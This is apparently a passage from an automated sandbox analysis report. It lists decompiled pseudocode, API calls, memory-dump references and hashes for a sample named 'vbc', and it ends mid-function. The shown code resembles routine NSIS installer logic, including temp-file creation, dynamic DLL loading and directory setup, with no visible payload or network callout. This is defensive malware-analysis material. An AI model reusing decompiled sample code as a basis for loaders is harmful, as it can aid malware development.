                                                0x73191824
                                                0x7319182c
                                                0x73191839
                                                0x73191847
                                                0x7319184a
                                                0x7319184c
                                                0x73191851
                                                0x73191856
                                                0x73191978
                                                0x73191978
                                                0x7319185c
                                                0x73191860
                                                0x73191863
                                                0x73191868
                                                0x73191869
                                                0x7319186a
                                                0x73191870
                                                0x73191876
                                                0x731918a6
                                                0x731918ad
                                                0x731918d1
                                                0x7319191e
                                                0x7319191f
                                                0x731918d3
                                                0x731918d3
                                                0x731918d4
                                                0x731918dd
                                                0x731918de
                                                0x731918e8
                                                0x731918eb
                                                0x731918f0
                                                0x731918f7
                                                0x731918f7
                                                0x731918fd
                                                0x731918fe
                                                0x73191904
                                                0x7319190a
                                                0x73191917
                                                0x73191918
                                                0x7319191b
                                                0x731918af
                                                0x731918af
                                                0x731918b0
                                                0x731918c5
                                                0x731918c5
                                                0x73191929
                                                0x7319192c
                                                0x73191939
                                                0x73191940
                                                0x73191948
                                                0x7319194b
                                                0x7319194b
                                                0x73191948
                                                0x73191958
                                                0x73191960
                                                0x73191965
                                                0x73191958
                                                0x7319196d
                                                0x00000000
                                                0x7319196f
                                                0x00000000
                                                0x73191970
                                                0x7319196d
                                                0x7319187a
                                                0x7319187d
                                                0x7319189b
                                                0x00000000
                                                0x00000000
                                                0x7319189e
                                                0x731918a3
                                                0x731918a3
                                                0x731918a5
                                                0x00000000
                                                0x731918a5
                                                0x7319187f
                                                0x73191880
                                                0x73191888
                                                0x73191889
                                                0x00000000
                                                0x73191889
                                                0x73191882
                                                0x73191883
                                                0x73191891
                                                0x00000000
                                                0x73191891
                                                0x73191886
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73191886

                                                APIs
                                                  • Part of subcall function 73191BFF: GlobalFree.KERNEL32(?), ref: 73191E74
                                                  • Part of subcall function 73191BFF: GlobalFree.KERNEL32(?), ref: 73191E79
                                                  • Part of subcall function 73191BFF: GlobalFree.KERNEL32(?), ref: 73191E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 731918C5
                                                • FreeLibrary.KERNEL32(?), ref: 7319194B
                                                • GlobalFree.KERNEL32(00000000), ref: 73191970
                                                  • Part of subcall function 7319243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7319246F
                                                  • Part of subcall function 73192810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73191896,00000000), ref: 731928E0
                                                  • Part of subcall function 73191666: wsprintfW.USER32 ref: 73191694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680955467.0000000073191000.00000020.00000001.01000000.00000004.sdmp, Offset: 73190000, based on PE: true
                                                • Associated: 00000004.00000002.680948427.0000000073190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680961588.0000000073194000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000004.00000002.680965648.0000000073196000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_73190000_vbc.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: e5a12ade8a7e7180c4d50256d5b5122d5093d1b8e191bf6da6bf99a3804d121d
                                                • Instruction ID: 1094bce85dbb0d5faa4a53c6041a1f56c17b6a00a3df01e468640594f29c0b82
                                                • Opcode Fuzzy Hash: e5a12ade8a7e7180c4d50256d5b5122d5093d1b8e191bf6da6bf99a3804d121d
                                                • Instruction Fuzzy Hash: E941AEB29003C99FFB119F20D884B9537ACAB05354F1A44B5ED0BAA4C6DBB880C5C768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 940 40605c-406068 941 406069-40609d GetTickCount GetTempFileNameW 940->941 942 4060ac-4060ae 941->942 943 40609f-4060a1 941->943 945 4060a6-4060a9 942->945 943->941 944 4060a3 943->944 944->945
                                                C-Code - Quality: 100%
                                                			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                				intOrPtr _v8;
                                                				short _v12;
                                                				short _t12;
                                                				intOrPtr _t13;
                                                				signed int _t14;
                                                				WCHAR* _t17;
                                                				signed int _t19;
                                                				signed short _t23;
                                                				WCHAR* _t26;
                                                
                                                				_t26 = _a4;
                                                				_t23 = 0x64;
                                                				while(1) {
                                                					_t12 =  *L"nsa"; // 0x73006e
                                                					_t23 = _t23 - 1;
                                                					_v12 = _t12;
                                                					_t13 =  *0x40a57c; // 0x61
                                                					_v8 = _t13;
                                                					_t14 = GetTickCount();
                                                					_t19 = 0x1a;
                                                					_v8 = _v8 + _t14 % _t19;
                                                					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                					if(_t17 != 0) {
                                                						break;
                                                					}
                                                					if(_t23 != 0) {
                                                						continue;
                                                					} else {
                                                						 *_t26 =  *_t26 & _t23;
                                                					}
                                                					L4:
                                                					return _t17;
                                                				}
                                                				_t17 = _t26;
                                                				goto L4;
                                                			}












                                                0x00406062
                                                0x00406068
                                                0x00406069
                                                0x00406069
                                                0x0040606e
                                                0x0040606f
                                                0x00406072
                                                0x00406077
                                                0x0040607a
                                                0x00406084
                                                0x00406091
                                                0x00406095
                                                0x0040609d
                                                0x00000000
                                                0x00000000
                                                0x004060a1
                                                0x00000000
                                                0x004060a3
                                                0x004060a3
                                                0x004060a3
                                                0x004060a6
                                                0x004060a9
                                                0x004060a9
                                                0x004060ac
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-4262883142
                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 946 4020d8-4020e4 947 4021a3-4021a5 946->947 948 4020ea-402100 call 402da6 * 2 946->948 949 4022f1-4022f6 call 401423 947->949 958 402110-40211f LoadLibraryExW 948->958 959 402102-40210e GetModuleHandleW 948->959 955 402c2a-402c39 949->955 961 402121-402130 call 406979 958->961 962 40219c-40219e 958->962 959->958 959->961 965 402132-402138 961->965 966 40216b-402170 call 40559f 961->966 962->949 967 402151-402164 call 73191817 965->967 968 40213a-402146 call 401423 965->968 971 402175-402178 966->971 973 402166-402169 967->973 968->971 979 402148-40214f 968->979 971->955 974 40217e-402188 call 403b8c 971->974 973->971 974->955 978 40218e-402197 FreeLibrary 974->978 978->955 979->971
                                                C-Code - Quality: 60%
                                                			E004020D8(void* __ebx, void* __eflags) {
                                                				struct HINSTANCE__* _t23;
                                                				struct HINSTANCE__* _t31;
                                                				void* _t32;
                                                				WCHAR* _t35;
                                                				intOrPtr* _t36;
                                                				void* _t37;
                                                				void* _t39;
                                                
                                                				_t32 = __ebx;
                                                				asm("sbb eax, 0x434fc0");
                                                				 *(_t39 - 4) = 1;
                                                				if(__eflags < 0) {
                                                					_push(0xffffffe7);
                                                					L15:
                                                					E00401423();
                                                					L16:
                                                					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                					return 0;
                                                				}
                                                				_t35 = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                					L3:
                                                					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                					_t47 = _t23 - _t32;
                                                					 *(_t39 + 8) = _t23;
                                                					if(_t23 == _t32) {
                                                						_push(0xfffffff6);
                                                						goto L15;
                                                					}
                                                					L4:
                                                					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                					if(_t36 == _t32) {
                                                						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                					} else {
                                                						 *(_t39 - 4) = _t32;
                                                						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                						} else {
                                                							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                							if( *_t36() != 0) {
                                                								 *(_t39 - 4) = 1;
                                                							}
                                                						}
                                                					}
                                                					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                						FreeLibrary( *(_t39 + 8));
                                                					}
                                                					goto L16;
                                                				}
                                                				_t31 = GetModuleHandleW(_t35); // executed
                                                				 *(_t39 + 8) = _t31;
                                                				if(_t31 != __ebx) {
                                                					goto L4;
                                                				}
                                                				goto L3;
                                                			}










                                                0x004020d8
                                                0x004020d8
                                                0x004020dd
                                                0x004020e4
                                                0x004021a3
                                                0x004022f1
                                                0x004022f1
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c39
                                                0x00402c39
                                                0x004020f3
                                                0x004020fd
                                                0x00402100
                                                0x00402110
                                                0x00402114
                                                0x0040211a
                                                0x0040211c
                                                0x0040211f
                                                0x0040219c
                                                0x00000000
                                                0x0040219c
                                                0x00402121
                                                0x0040212c
                                                0x00402130
                                                0x00402170
                                                0x00402132
                                                0x00402135
                                                0x00402138
                                                0x00402164
                                                0x0040213a
                                                0x0040213d
                                                0x00402146
                                                0x00402148
                                                0x00402148
                                                0x00402146
                                                0x00402138
                                                0x00402178
                                                0x00402191
                                                0x00402191
                                                0x00000000
                                                0x00402178
                                                0x00402103
                                                0x0040210b
                                                0x0040210e
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsb1814.tmp\System.dll,00000000,00425A20,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                  • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                  • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 334405425-0
                                                • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 981 4015c1-4015d5 call 402da6 call 405eb7 986 401631-401634 981->986 987 4015d7-4015ea call 405e39 981->987 989 401663-4022f6 call 401423 986->989 990 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 986->990 995 401604-401607 call 405aeb 987->995 996 4015ec-4015ef 987->996 1003 402c2a-402c39 989->1003 990->1003 1010 40165b-40165e 990->1010 1002 40160c-40160e 995->1002 996->995 1000 4015f1-4015f8 call 405b08 996->1000 1000->995 1014 4015fa-4015fd call 405a6e 1000->1014 1006 401610-401615 1002->1006 1007 401627-40162f 1002->1007 1011 401624 1006->1011 1012 401617-401622 GetFileAttributesW 1006->1012 1007->986 1007->987 1010->1003 1011->1007 1012->1007 1012->1011 1016 401602 1014->1016 1016->1002
                                                C-Code - Quality: 86%
                                                			E004015C1(short __ebx, void* __eflags) {
                                                				void* _t17;
                                                				int _t23;
                                                				void* _t25;
                                                				signed char _t26;
                                                				short _t28;
                                                				short _t31;
                                                				short* _t34;
                                                				void* _t36;
                                                
                                                				_t28 = __ebx;
                                                				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                				_t17 = E00405EB7(_t16);
                                                				_t32 = _t17;
                                                				if(_t17 != __ebx) {
                                                					do {
                                                						_t34 = E00405E39(_t32, 0x5c);
                                                						_t31 =  *_t34;
                                                						 *_t34 = _t28;
                                                						if(_t31 != _t28) {
                                                							L5:
                                                							_t25 = E00405AEB( *(_t36 + 8));
                                                						} else {
                                                							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                								goto L5;
                                                							} else {
                                                								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                							}
                                                						}
                                                						if(_t25 != _t28) {
                                                							if(_t25 != 0xb7) {
                                                								L9:
                                                								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                							} else {
                                                								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                								if((_t26 & 0x00000010) == 0) {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                						 *_t34 = _t31;
                                                						_t32 = _t34 + 2;
                                                					} while (_t31 != _t28);
                                                				}
                                                				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                					_push(0xfffffff5);
                                                					E00401423();
                                                				} else {
                                                					E00401423(0xffffffe6);
                                                					E0040653D(0x441000,  *(_t36 + 8));
                                                					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                					if(_t23 == 0) {
                                                						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                					}
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                				return 0;
                                                			}











                                                0x004015c1
                                                0x004015c9
                                                0x004015cc
                                                0x004015d1
                                                0x004015d5
                                                0x004015d7
                                                0x004015df
                                                0x004015e1
                                                0x004015e4
                                                0x004015ea
                                                0x00401604
                                                0x00401607
                                                0x004015ec
                                                0x004015ec
                                                0x004015ef
                                                0x00000000
                                                0x004015fa
                                                0x004015fd
                                                0x004015fd
                                                0x004015ef
                                                0x0040160e
                                                0x00401615
                                                0x00401624
                                                0x00401624
                                                0x00401617
                                                0x0040161a
                                                0x00401622
                                                0x00000000
                                                0x00000000
                                                0x00401622
                                                0x00401615
                                                0x00401627
                                                0x0040162b
                                                0x0040162c
                                                0x004015d7
                                                0x00401634
                                                0x00401663
                                                0x004022f1
                                                0x00401636
                                                0x00401638
                                                0x00401645
                                                0x0040164d
                                                0x00401655
                                                0x0040165b
                                                0x0040165b
                                                0x00401655
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                  • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID:
                                                • API String ID: 1892508949-0
                                                • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E00401389(signed int _a4) {
                                                				intOrPtr* _t6;
                                                				void* _t8;
                                                				void* _t10;
                                                				signed int _t11;
                                                				void* _t12;
                                                				signed int _t16;
                                                				signed int _t17;
                                                				void* _t18;
                                                
                                                				_t17 = _a4;
                                                				while(_t17 >= 0) {
                                                					_t6 = _t17 * 0x1c +  *0x434f30;
                                                					if( *_t6 == 1) {
                                                						break;
                                                					}
                                                					_push(_t6); // executed
                                                					_t8 = E00401434(); // executed
                                                					if(_t8 == 0x7fffffff) {
                                                						return 0x7fffffff;
                                                					}
                                                					_t10 = E0040136D(_t8);
                                                					if(_t10 != 0) {
                                                						_t11 = _t10 - 1;
                                                						_t16 = _t17;
                                                						_t17 = _t11;
                                                						_t12 = _t11 - _t16;
                                                					} else {
                                                						_t12 = _t10 + 1;
                                                						_t17 = _t17 + 1;
                                                					}
                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                						 *0x433eec =  *0x433eec + _t12;
                                                						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                					}
                                                				}
                                                				return 0;
                                                			}











                                                0x0040138a
                                                0x004013fa
                                                0x0040139b
                                                0x004013a0
                                                0x00000000
                                                0x00000000
                                                0x004013a2
                                                0x004013a3
                                                0x004013ad
                                                0x00000000
                                                0x00401404
                                                0x004013b0
                                                0x004013b7
                                                0x004013bd
                                                0x004013be
                                                0x004013c0
                                                0x004013c2
                                                0x004013b9
                                                0x004013b9
                                                0x004013ba
                                                0x004013ba
                                                0x004013c9
                                                0x004013cb
                                                0x004013f4
                                                0x004013f4
                                                0x004013c9
                                                0x00000000

                                                APIs
                                                • MulDiv.KERNEL32 ref: 004013E4
                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00405672(signed int __eax) {
                                                				intOrPtr _v0;
                                                				intOrPtr _t10;
                                                				intOrPtr _t11;
                                                				intOrPtr* _t12;
                                                
                                                				_t11 =  *0x434f28;
                                                				_t10 =  *0x434f2c;
                                                				__imp__OleInitialize(0); // executed
                                                				 *0x434fc0 =  *0x434fc0 | __eax;
                                                				E004044E5(0);
                                                				if(_t10 != 0) {
                                                					_t12 = _t11 + 0xc;
                                                					while(1) {
                                                						_t10 = _t10 - 1;
                                                						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                                                							break;
                                                						}
                                                						_t12 = _t12 + 0x818;
                                                						if(_t10 != 0) {
                                                							continue;
                                                						} else {
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x434f8c =  *0x434f8c + 1;
                                                				}
                                                				L7:
                                                				E004044E5(0x404);
                                                				__imp__OleUninitialize();
                                                				return  *0x434f8c;
                                                			}







                                                0x00405673
                                                0x0040567a
                                                0x00405682
                                                0x00405688
                                                0x00405690
                                                0x00405697
                                                0x00405699
                                                0x0040569c
                                                0x0040569c
                                                0x004056a1
                                                0x00000000
                                                0x00000000
                                                0x004056b2
                                                0x004056ba
                                                0x00000000
                                                0x00000000
                                                0x004056bc
                                                0x00000000
                                                0x004056ba
                                                0x004056be
                                                0x004056be
                                                0x004056c4
                                                0x004056c9
                                                0x004056ce
                                                0x004056db

                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405682
                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                • OleUninitialize.OLE32 ref: 004056CE
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitialize
                                                • String ID:
                                                • API String ID: 2896919175-0
                                                • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                                                • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                                                • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040690A(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
